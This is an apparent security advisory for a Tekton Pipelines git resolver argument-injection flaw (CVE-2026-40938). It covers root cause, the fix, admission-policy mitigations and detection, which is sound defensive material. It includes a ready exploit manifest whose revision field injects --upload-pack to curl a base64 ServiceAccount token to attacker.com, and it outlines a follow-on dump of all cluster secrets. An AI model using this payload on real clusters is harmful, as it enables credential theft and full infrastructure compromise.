CVE-2026-40938: Remote Code Execution via Argument Injection in Tekton Pipelines Git Resolver

Tekton Pipelines utilizes a git resolver component to retrieve remote pipeline definitions and tasks from external repositories. This component parses user-supplied specifications and translates them into git commands executed within the resolver pod. The vulnerability, identified as CVE-2026-40938, resides within this translation layer where input validation fails to sanitize parameters before command execution.

The core issue is a CWE-88 Argument Injection vulnerability triggered through the ResolutionRequest Custom Resource Definition (CRD). The resolver processes the revision parameter from this CRD and passes it directly as a positional argument to the underlying git fetch system call. Because git relies on prefix-based parsing to distinguish between references and command-line flags, this direct pass-through creates an injection vector.

Exploitation results in unauthenticated Remote Code Execution (RCE) on the tekton-pipelines-resolvers pod. Attackers leverage the --upload-pack flag to force git to execute arbitrary binaries present on the local container filesystem. The impact extends beyond the pod boundary due to the privileges typically assigned to the resolver's ServiceAccount.

The Common Vulnerability Scoring System (CVSS) vector for this flaw is CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H, reflecting a high severity rating of 7.5. The attack complexity is rated high because successful exploitation requires the attacker to predict or stage a local git repository path on the resolver pod. The privileges required are low, necessitating only the ability to submit ResolutionRequest objects to the Kubernetes API.

The argument injection flaw requires two separate vulnerable conditions to overlap within the Tekton codebase. The primary defect exists in pkg/resolution/resolver/git/repository.go, where the revision string is appended to the git fetch command without a -- separator. The -- separator instructs POSIX-compliant applications to treat all subsequent input as positional arguments rather than flags.

When git fetch receives a reference string beginning with a hyphen, its internal argument parser interprets the string as an option. The --upload-pack flag specifically overrides the path to the program invoked on the local machine when fetching from a local repository. By providing --upload-pack=/usr/bin/curl, the attacker forces git to launch the curl binary instead of the standard git-upload-pack routine.

The secondary defect resides in the URL validation logic found in pkg/resolution/resolver/git/resolver.go. The validateRepoURL function relies on a regular expression ^(/|[^@]+@[^:]+|(git|https?)://) to verify the target repository URL. This regular expression explicitly permits file paths starting with a forward slash /, allowing the resolver to target local directories.

These two defects compound to create the exploit primitive. When git fetch is directed at a local filesystem path, it executes the binary specified in --upload-pack locally on the resolver pod. If the repository were forced to be remote, git would attempt to execute the --upload-pack binary on the remote server, nullifying the local code execution impact. The permissive regex enables the local execution context necessary for the attack.

The vulnerable execution path begins in the checkout function of the repository struct. The Go code invokes the git binary using a wrapper function that passes the context and a variadic list of string arguments. The revision variable is inserted directly into this list without sanitization or structural isolation.

func (repo *repository) checkout(ctx context.Context, revision string) error {
    // Vulnerable implementation lacks '--' separator and prefix checks
    _, err := repo.execGit(ctx, "fetch", "origin", revision, "--depth=1")
    if err != nil {
        return err
    }
    // ...
}

The fix implemented in Tekton Pipelines version 1.11.1 introduces explicit input validation for the revision parameter. The developers added a check to ensure the string does not begin with a hyphen. This modification directly mitigates the argument injection by preventing the git parser from interpreting the user-controlled string as a command-line flag.

While restricting the hyphen prefix addresses the immediate execution vector, defense-in-depth requires further structural changes. A comprehensive fix would also involve placing the -- separator before the revision argument in the execGit call. The inclusion of -- forces git to treat revision as a refspec, regardless of its contents.

Additionally, evaluating the validateRepoURL regex reveals that allowing local paths in production environments introduces unnecessary attack surface. Restricting the url parameter to strict http://, https://, or git:// schemes prevents the local evaluation of --upload-pack. Administrators should apply admission control policies to enforce this restriction at the API level.

The exploitation sequence requires the attacker to possess tenant-level access to the Kubernetes cluster, specifically the RBAC permissions necessary to create ResolutionRequest objects. The attacker must first determine or guess a valid git repository path existing locally on the resolver pod. Common default paths or temporary directories, such as /tmp/repo, frequently satisfy this requirement.

The payload is delivered via a crafted YAML manifest submitted to the Kubernetes API. The attacker constructs a ResolutionRequest where the url targets the local path and the revision contains the --upload-pack injection. The command injected via the flag typically leverages standard Unix utilities present in the container image, such as curl or sh.

apiVersion: resolution.tekton.dev/v1beta1
kind: ResolutionRequest
metadata:
  name: rce-exploit
  labels:
    resolution.tekton.dev/type: git
spec:
  params:
    - name: url
      value: /tmp/repo
    - name: revision
      value: "--upload-pack=/usr/bin/curl http://attacker.com/$(cat /var/run/secrets/kubernetes.io/serviceaccount/token | base64)"
    - name: pathInRepo
      value: README.md

Upon processing the CRD, the Tekton controller parses the parameters and initiates the git fetch operation. The sub-shell executed by git evaluates the embedded command substitution, reading the Kubernetes ServiceAccount token from the pod's filesystem. The curl binary then transmits the base64-encoded token to the attacker-controlled server via an HTTP request.

Successful exploitation yields immediate Remote Code Execution within the context of the tekton-pipelines-resolvers pod. This container executes as a non-root user by default, but it possesses significant network access and mounted credentials. The attacker gains the ability to interact with internal cluster services, query the Kubernetes API, and deploy internal reconnaissance tools.

The most critical impact derives from the Kubernetes Role-Based Access Control (RBAC) permissions granted to the resolver component. To perform its designated functions, the resolver's ServiceAccount typically requires broad cluster-level permissions, including the ability to get, list, and watch all Secrets across all namespaces. This access level is necessary for resolving authentication credentials for various remote repositories.

Once the attacker extracts the ServiceAccount token from /var/run/secrets/kubernetes.io/serviceaccount/token, they authenticate to the Kubernetes API as the resolver service. The attacker can then issue a single API request to dump the contents of all Kubernetes Secrets. This mass exfiltration compromises database passwords, TLS certificates, API keys, and application-specific credentials.

The compromise of cluster secrets frequently leads to full infrastructure compromise and lateral movement. If the cluster stores cloud provider credentials (such as AWS IAM access keys or GCP service account JSON files), the attacker can pivot from the Kubernetes environment into the underlying cloud platform. This escalation path transforms an application-layer injection flaw into a complete domain breach.

The primary remediation for CVE-2026-40938 is updating the Tekton Pipelines installation to version 1.11.1 or later. This release contains the necessary input validation checks that reject revision strings beginning with a hyphen. Administrators should follow standard deployment procedures to apply the new controller manifests and verify that the resolver pods restart with the updated image.

Organizations unable to patch immediately must implement compensating controls at the Kubernetes API layer. Deploying an Open Policy Agent (OPA) Gatekeeper or Kyverno admission policy provides effective mitigation. The policy must intercept ResolutionRequest objects and reject any payload where the revision parameter matches the regex pattern ^-.

Security teams should monitor infrastructure logs for indicators of compromise related to this attack vector. Audit logs from the Kubernetes API server will record the submission of malicious ResolutionRequest objects. Teams should configure SIEM alerts for any revision parameters containing the --upload-pack string.

Runtime security tools utilizing eBPF can detect post-exploitation activity on the resolver pods. Administrators should configure rules to generate alerts if the tekton-pipelines-resolvers pod spawns unexpected child processes from the git binary, such as curl, wget, bash, or sh. Monitoring outbound network connections from the pod to unknown external IP addresses also assists in identifying data exfiltration attempts.